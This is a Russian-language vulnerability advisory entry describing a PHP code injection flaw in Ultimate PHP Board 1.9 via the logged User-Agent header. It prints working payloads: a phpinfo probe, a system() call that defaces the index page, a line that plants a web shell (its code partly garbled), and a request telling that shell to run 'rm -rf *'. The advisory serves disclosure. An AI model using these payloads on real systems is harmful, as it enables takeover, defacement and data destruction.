Дата публикации: | 29.05.2003 |
Дата изменения: | 17.10.2006 |
Всего просмотров: | 2025 |
Опасность: | |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Описание: | Уязвимость обнаружена в Ultimate PHP Board (UPB). Удаленный пользователь может выполнить произвольный PHP код на системе как UPB администратор.
F0KP сообщает, что в этом форуме присутствует серьезная уязвимость, которая позволяетатакующему выполнять произвольный php код. UPB протоколирует некоторую информацию о посетителях [ такую как REMOTE_ADDR и HTTP_USER_AGENT ] в текстовый файл в директории `db', который называется `iplog'. затем в панели администратора, администратор форума может вызвать admin_iplog.php, который просто подключает `iplog'. Например: e@some_host$ telnet hostname 80 Connected to hostname at 80 GET /board/index.php HTTP/1.0 User-Agent: <? phpinfo(); ?>когда администратор вызовет admin_iplog.php, ваш код php будет выполнен. Пример: 1. <? system( "echo \'hacked\' > ../index.html" ); ?>дефейсит главную страницу форума. 2. system( "echo \' system( $cmd ); ?>\' > ../../tcsh.php" ); ?> создаст tcsh.php с правами httpd в корневой директории веб-сайта. затем вам просто нужно будет зайти на http://hostname/tcsh.php?cmd=rm -rf * после внедрения кода через поле User-Agent вам нужно подождать пока администратор посмотрит admin_iplog.php. Уязвимость обнаружена в Ultimate PHP Board 1.9 |
Ссылки: | UPB: Захват Форума/Веб-сайта |